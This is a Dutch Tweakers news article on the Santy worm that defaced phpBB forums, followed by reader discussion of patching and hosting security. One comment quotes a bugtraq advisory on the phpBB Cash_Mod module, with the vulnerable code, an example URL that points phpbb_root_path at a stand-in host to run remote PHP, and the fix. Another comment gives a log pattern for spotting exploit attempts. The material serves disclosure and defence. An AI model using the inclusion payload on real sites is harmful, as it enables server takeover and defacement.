Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 93 reacties
Bron: Viruslist

Op Viruslist.com wordt melding gemaakt van de worm Net-Worm.Perl.Santy.a die het gemunt heeft op phpBB-forums. Door gebruik te maken van een fout in de versies tot 2.0.11 van deze software, slaagt de worm erin alle asp-, php-, htm- en shtm-bestanden te overschrijven met zijn eigen code, waardoor de desbetreffende site 'defaced' wordt. Om nieuwe slachtoffers te vinden maakt deze worm gebruik van Google, wat voor deze zoekmachine de aanleiding geweest is om de queries afkomstig van deze malware te blokkeren. Het is overigens niet de eerste keer dat virussen gebruikmaken van zoekmachines om zichzelf te verspreiden.

Eerder al werden verschillende zoekdiensten belaagd door een variant van Mydoom die op zoek was naar nieuwe e-mailadressen. Nu de verspreiding van de worm tegengehouden wordt en de meeste fora een upgrade gekregen hebben is het volgens Roel Schouwenberg van Kaspersky Labs echter niet waarschijnlijk dat er een nieuwe variant van de Santy-worm zal opduiken, of dat deze indien hij toch verschijnt veel schade aan zal richten.

Defaced door Santy
Moderatie-faq Wijzig weergave

Reacties (93)

Ik heb zojuist m'n phpBB-forum al gepatched met de code van het phpBB.com forum. Op GoT loopt er ook een topic over en op isc.sans.org is ook veel informatie te vinden. In de logs hier kwam ik trouwens al een paar pogingen tegen, gelukkig blokkeert Google het nu.
Het is idd een oude bug die al lang gepatched is. Zelf hebben ze bij mij (forum.mtavc.com) ook veel schade aangericht een dag nadat de bug bekend was. Uiteraard nadien men backup terug gezet en gepatched. Op dat moment was 2.0.11 nog niet vermeld op de meuktracker en ook op andere plaatsen waar ik kom was nog geen vermelding. Pas na het kwaad geschiet was heb ik overal de melding gekregen.

Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken. De enigste mogelijkheid is dus regelmatig de phpBB site checken. En zelfs dan kan je nog te laat komen.

De bug ontstaat uit de functie urldecode die gebruikt word in de highlight functie in viewtopic.php (bij zoeken word deze gebruikt). En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip. De bug laat toe om commando's via php exec uit te voeren. Je kan dus veel verwijderen, zeker als je de directory structuur een beetje kent.
Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken.
Dat hebben ze wel: klik. Bovendien kan je je abonneren op de list van phpBBhacks, een zeer actieve fan community.
En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip.
Access logs, anyone? Gewoon even zoeken naar GET requests met %2527%252e in de uri.
De bug laat toe om commando's via php exec uit te voeren.
De bug laat toe om zowat elk PHP commando uit te voeren. exec en system zijn slechts voorbeelden van de ontdekster Jessica Soules (howdark.com).
dan moet je php maar in safe_mode draaien
@demonite

safe mode is een slechte oplossing voor dit probleem.
safe mode is zowieso een slechte manier om shared server problemen op te lossen.
The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now
Ehhhm, AL gepatched ? Een belangrijke fout in phpbb waar al een patch voor uitkwam in november heb je nu AL gepatched ?? :Y)
Zolang je site niet van levensbelang voor je is, zie ik niet in waarom je elke dag de phpBB site moet checken om te kijken of er een update is ;)

Eens per maand lijkt me dan ruim voldoende, alleen is dit wel een erg kritieke fout natuurlijk, en iets ernstiger dan het verneuken van de lay-out of iets dergelijks.
En stond dus ook ruim een maand geleden al op bugtraq.


To: bugtraq@securityfocus.com
Subject: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)

Hi all


phpBB is a very popular message board using modules extensions.


One of these module ­ Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.


Let’s start :


In file /admin/admin_cash.php


…..
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
….


First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but
$phpbb_root_path & .$phpEx ­ are *NOT* define yet!


I don’t know why, but someone decided to define these variables later in the code :


……
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


…..


Well, any user can rewrite these parameters with GET or POST requests.


Example :
http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root _path=http://bad.host/


Fix :
Set all default parameters after “if ( !empty($setmodules) )”


Example :


//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);


Thank you rofl!
Bug is van 18/11, meer dan een maand oud dus.
Waar maken jullie je toch allemaal druk om :+
Deze lek is al langer dan een maand geleden beschreven door de makers van phpBB. als je secuur genoeg bent met alle scripts die je draait, dan had je het forum allang geupdate. Desalnietemin erg vervelend voor de gedupeerden. Dit is misschien een wakkermakertje voor de minder oplettende systeembeheerder/websiteontwikkelaar.
Vergeet niet dat veel onderdelen die op een forum draaien vaak niet werken op een nieuwe versie. Het is dan best wel veel werk om alles weer aan te passen dan...
waar je meer als een maand de tijd voro hebt gehad, oftewel geen excuus.
ja daar kom ik inderdaad ook elke week, want ik heb mijn forumpje voor de gein voor een paar vriend gehost en bezoek dus elke week voor hun en mijn veiligheid dat forum
Ik ging eens kijken op google en verbaas me echt over de hoeveelheid sites die hiermee te maken hebben (gehad)
zie:
http://www.google.nl/search?hl=nl&q=%22this+site+is+defaced%21%21%21%2 2&lr=
Zo'n 1500 sites ongeveer. Je kunt zelfs zien dat er tenmisnte 24 generaties van de worm actief zijn geweest. Ik neem aan dat de maker van deze worm gelijk zo veel mogelijk achterdeurtjes geïnstalleerd heeft, want anders heeft zo'n vernietigende aanval helemaal geen zin.
Waarom?
Als je defaced bent zet je toch je backup terug, en patched het geheel?
Ik heb vrij weinig medelijden met de "gedupeerden".
Nou, realiseer je wel dat er heel wat goedbedoelende mensen zijn met minimale kennis van IT die via dit soort gebruikersvriendelijke software toch een forumpje kunnen hosten. Mensen die dus nooit op IT gerichte fora, mailinglists of andere plaatsen komen en dus niets wisten van deze zaken en dat het liefst ook zo hadden gelaten. Of vind je dat internet alleen voor IT nerds is ofzo? Ik begrijp die hele houding niet, het is toch niet de schuld van het slachtoffer dat iemand/iets door zijn niet waterdichte beveiliging glipt? Dat is toch de schuld van de dader?
Ik vind dat je als eigenaar van een community/forum/site de plicht hebt om op de hoogte te blijven van de software die draait.

Dat je als eigenaar van een site niet verantwoordelijk bent voor de gevolgen van een fout in apache, akkoord (dat is meestal de verantwoordelijkheid van je hosting provider) maar voor de software die je draait vind ik dat je zelf verantwoordelijk bent - en als je dat niet kan wegens een gebrekkige kennis moet je het maar door iemand anders laten doen.

Stel je voor dat die exploit nu eens alle users en hun email adres uit de database had gehaald en die dan lekker had beginnen spammen ... dat had vrij zuur geweest. Ik vind dat je als eigenaar van de site een zekere "verantwoordelijkheid" hebt tov je leden
Dus de onwetende beheerders zijn maar ten dele schuldig :)

De fout komt namelijk voor in combinatie met php versies van voor 4.3.10, en da's nou weer de verantwoordelijkheid van de admin.

Best wel een klote worm trouwens, een bekende zijn site was inderdaad defaced omdat iemand anders op de shared hosting server een phpBB had die gehackt was... slechte beurt van de provider die de accounts niet goed had gescheiden.
De fout komt namelijk voor in combinatie met php versies van voor 4.3.10, en da's nou weer de verantwoordelijkheid van de admin.
Nee, dat is een andere bug, waarmee je de inhoud van config.php van phpBB kan opvragen (dus de database account gegevens!).Waat phpBB overigens geen schuld aan heeft, omdat het een bug is in PHP zelf.

Denk dus niet dat je met je oude phpBB veilig zit voor de Santy worm als je PHP 4.3.10 of 5.0.3 gebruikt ;)
tja als ze regelmatig de phpbb site gechecked hadden hadden ze geweten dat er steeds nieuwe versies uitkomen, en ook het update systeem is zeer gebruiksvriendelijk.
inderdaad, de enige waar je medelijden mee moet hebben is dat figuur dat het virus heeft geschreven :'(
Het was al lang duidelijk toen deze update uitkwam dat er problemen gingen komen, heb het hier ook al aangehaald: http://www.tweakers.net/meuktracker/7828

PHPBB heeft overigens een zeer slechte reputatie op security gebied. Zowat elke versie > 2.0.0 heeft een ernstig lek gedicht. Ik had gehoopt dat het intussen zowat volledig dicht ging zitten, maar ik vrees ervoor. :( Een goed advies: zorg dat je *altijd* de laatste versie draait van dit pakket.
Een goed advies: zorg dat je *altijd* de laatste versie draait van dit pakket.
Die tip kan je aanhalen voor elk stukje software. Elke ontwikkelaar maakt veiligheids fouten, en dan kan je het maar beter treffen met phpBB, omdat die er telkens als de kippen bij zijn met updates zodra het weer mis gaat. Als voorbeeld hoe het niet moet kunnen we Microsoft pakken: 's werelds machtigste softwarebakker speelt het ook keer op keer klaar nieuwe gaten te leveren, met als groot verschil dat zij niet zo rap zijn met updates. Voor Intenet Explorer en Windows staan krieke fouten vaak weken tot maanden open, of erger.
afgelopen tijd af ik vaak een guest op m'n forum. Ik vond het vreemd dat het steeds dezelfde was. Dus na een lookup bleek dit msnbot.msn.com en ook googlebot te zijn.
maar dat zal dus hiermee te maken hebben
Nope, dat zijn de robot's van Google en MSN. Deze robot's zijn geautomatiseerd en verzamelen data wat de zoekmachines gebruiken voor het indexeren van sites.
Nee, dat heeft hier helemaal niets mee te maken;

Er staat in de useragent van die bots meestal een link naar een uitleg pagina; dus lees je access.log er maar op na.
Nee dat heeft hier niks mee te maken.
googlebot, msnbot, etc.. indexen gewoon je site, meer niet, dit is normaal gedrag.
Nmm is het gewoon onverantwoord om phpBB voor je site te gebruiken, tenzij deze beveiligd is met normale http gebruikers authenticatie of niet van buitenaf bereikbaar is. De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken. Toch wordt het door website beheerders zeer geregeld standaard maar toegepast voor het gemak. Op veiligheid wordt kennelijk niet meer gelet. Hopelijk zorgt deze worm voor wat meer bewustwording van de gevaren.
Je denkwijze is begrijpelijk, maar je beredenatie zeer zeker niet.
De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken.
Hoewel ik toe moet geven dat sommige lekken, vooral de XSS holes van voor < 2.0.10, dom en onnodig waren, is het onzin dat phpBB onveilig is vanwege zijn vele updates het afgelopen jaar. Als je ook maar een flauw benul had hoeveel forums wereldwijd dit systeem gebruiken, begrijp je de motivatie achter securitygroepen om het beestje te kunnen kraken. Andere open source forum systemen ljken nu veiliger omdat ze minder aandacht krijgen van deze mensen. In mijn ogen is dat alleen maar schadelijker, want feitelijk betekent dat dat de veiligheidslekken dan blijven bestaan. Geen enkel dynamisch script met de omvang van phpBB is 100% veilig, het is en blijft een voortdurend proces.
Op veiligheid wordt kennelijk niet meer gelet.
Hoe verklaar je dan de snelle response waarmee phpBB uren nadat kritische lekken gemeld worden, patches released? Doet de uitmuntende support op de internationale en nationale phpBB forums je niets? Of hamert phpBB naar jouw mening niet genoeg op de risico's van niet upgraden? Vier officiële info threads op de frontpage over één exploit lijken mij ruim voldoende namelijk.
Ik vind mijn redenatie absoluut niet ongegrond. Ik heb het hier niet over onveiliger, maar gewoon dat het door de omstandigheden niet veilig is.
Het is natuurlijk niet vreemd dat een van de meest gebruikte webtools ook het meest aangevallen wordt, maar dat creeert op dit moment wel al een behoorlijke tijd dat het dus ook niet veilig genoeg is. Ziet vandaag een van de voorbeelden voor wie zn tool niet tijdig heeft geupdate.
Wat betreft die snelle responce: die zijn helaas oorzaak van onopgemerkte securitybugs die in definitieve releases zitten. Kijk eens even bij packetstormsecurity.nl oid en tel het aantal exploits die snel achter elkaar gevonden worden. Ja, een tool dat veel wordt gebruikt maakt grote kans om aangevallen te worden op zoek naar bugs, maar ze zitten er dus zeer vaak ook gewoon nog in ook. Als ik zou moeten kiezen bij een makkelijke tool dat een behoorlijk risico met zich mee brengt hoe dat beveilgd moet worden dan is die keus niet moeilijk gemaakt. Maar kennelijk denken daar veel mensen anders over, en ziet hier het resultaat van dat negerende gedrag.
En als jouw favoriete forum nou door iedereen gebruikt en aangevallen wordt, en niemand update tijdig bij het uitkomen van een vulnerability, is dat forum dan toch beter? Dezelfde omstandigheden dan IMO. Dus geen reden om phpBB te gaan bashen.
onzin kodak. als je zorgt dat je altijd up to date bent is het echt meer dan 99,9% veilig. bovendien zou je dan ook niet met linux/unix (zijn onlangs nog 40 tallen exploits in gevonden)kunnen werken. geen een stuk scriptwerk is exploit vrij zelfs (nou ja) microsoft niet.
Niks onzin. Phpbb is het meest onveilige (meest buggy en meest aangevallen) webonderhoud tool van de afgelopen jaren. Het is de harde realiteit dat veel gebruikers phpbb als makkelijke oplossing zien om iemand zn site te laten beheren en er na implementatie niet meer omkijkt naar het updaten. Zelfs als er al aan wordt gedacht om te updaten wordt dat vaak nog te laat gedaan ook. Kortom, je bent dus wel degelijk veiliger af als je het niet open en bloot op het internet gebruikt.
Mijn server is zaterdagavond 18 december dus gedefaced. Omdat niet alle sites in php safe mode draaien waren alle sites het slachtoffer van waarschijnlijk deze bug in phpBB. Precies kunnen we het niet zeggen want schijnbaar vinden ze het ook leuk /var/log leeg te gooien.

De server draait nu gelukkig weer, maar het heeft mij wel mijn zaterdagnacht en zondag gekost en ook gister en eergisteren nog bezig geweest!
hoe kan dat ding /var/log leeg gooien? /var/log is toch niet schrijfbaar voor de www user?
Dat vond ik ook wel vreemd. maar ik heb niet zoveel verstand van linux enzo, daarvoor heb ik de serverbeheerder..

Ik dacht zelf dat aangezien apache in die logs moet kunnen schrijven ze ook rechten hebben op /var/logs en apache is toch www user
Apache onder root account? dan ben je wel een ontiegelijke nono, want dan heb je apache gecompileerd met -DBIG_SECURITY_HOLE. Apache weigert nml te draaien als root.

Nee, sommige sites vinden het handig om de logs in de dir van de gebruiker te schrijven of iets dergelijks, zodat de klant zelf bij zijn apache logs kan. Blijkbaar laten ze schrijfacties toe, wat ervoor zorgt dat de worm deze ook weg kan gooien.

Sinds maandag draaien we hier alle sites met php4-cgi en mod_fastcgi en de suexec wrapper, alle sites draaien onder het UID van de klant. Hierdoor kunnen klanten niet meer aan elkanders spullen en hebben wormen geen grote invloed op de server over het algemeen. OK, de worm heeft nu de volle rechten om de userdir leeg te gooien, maar dat had ie toch al omdat anders upload scrips niet werken :X
Bij veel servers draait Apache onder de root account dus kan je de var/log zo leeg gooien _als_ je eenmaal toegang hebt.
@Jan de Groot
Onder cgi of fast-cgi draaien van apache is ook niet altijd een optie ondanks dat het wel makkelijker is om het veilig te krijgen...
Je mist een aantal environment variabelen die in mod_php wel beschikbaar zijn en op een druk bezochte server ga je ook de vertraging van de cgi wrapper tov mod_php wel merken...
@mxcreep:
Mag jij me uitleggen welke variabelen dat zijn. In eerste instantie had ik problemen met $SERVER["SCRIPT_NAME"] die verwees naar de php binary, dit was snel opgelolst met een php.ini setting (fix path info of iets dergelijks, zie commentaar in php.ini :P). Verder kopieert PHP zelf al een heleboel variabelen uit $ENV naar $_SERVER. Ik heb tot nu toe nog geen scripts gezien die niet werken met de CGI versie.

De fastcgi methode heeft iets meer overhead dan de module versie, maar valt genoeg mee:
- request komt binnen, php wordt met suexec gestart, wat even traag is als een CGI request
- volgende requests worden gebalanceerd over 10 runnende fastcgi PHP instanties, je merkt hier niet meer dat je een CGI versie draait, het gaat even snel als de module versie.
- Na een seconde of 20 inactiviteit op de site gooit de process manager de boel weer uit, blijkbaar zijn de PHP processen niet meer nodig.

Het voordeel is dat je dat ding kunt wrappen met suexec en dat je voor statische HTML niet continu die grote PHP module met al zn brakke libs mee hoeft te zeulen, die zitten in je CGI binary, die alleen actief is als er PHP requests voor de klant zijn.
Gedefaced dmv. deze worm of wat anders?
18 dec is namelijk erg vroeg...
Nee was niet deze worm.
Was de simiens groep.

plaats 10 op http://www.zone-h.org/en/hallofshame

:(
Tja, een illustratie waarom soms opensource software op sommige gebieden minder veilig is dan closed source. Iedereen kan heel gemakkelijk opzoek gaan naar bugs.

Als het closed source was geweest, was er niemand die $phpbb_root_path zou kennen, dus had niemand die aan de querystring toegevoegd.
Nou wil ik niet vervelend doen, maar php is altijd open-source. Aangezien je zelf de bestanden op je server moet zetten kun je de php bestanden gewoon lezen. (Of je moet met een of andere pre-compiler gaan werken)
Download dan voor de gein eens de gratis versie van het systeem achter GoT: MyReact. Je zult verbaast staan...
Ja, en daarom heb je dus ook, wat ews99 al zegt, zend-optimizer nodig, (die de de met zend-encoder ge-encode files, decodeert) en die is lang niet bij elke hoster geinstalleerd. Daar zal dit geintje dus ook niet draaien.
Ik hoor je. Al zie ik hier de link met $phpbb_root_path niet, omdat dat niets met deze bug te doen heeft. Als je doelt op Hodgesaargh's post hierboven raak je net zo fijn offtopic als hij, omdat dat een bug beschrijft in de optionele Cash mod, en niet in phpBB zelf.
Beetje een rare stelling imho;

PHP is in grondbeginsel nog steeds een script-taal. Er word dus geen code gecompileerd. Dat heeft niets met open source te maken maar gewoon met het punt dat scripttalen altijd leesbaar moet zijn omdat het script door een server word geinterpreteerd, en niet van tevoren word gecompileerd. Kijk bijvoorbeeld naar het oude UBB, dat was ook geen open-source, maar de code kon je wel inzien nadat je het gekocht had. (Het was immers geschreven in een scripttaal).

Nu zijn er tegenwordig wel weer encoders en dat soort grappen, maar lang niet elke webhoster ondersteunt dat spul dus daar is de markt te klein voor.

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True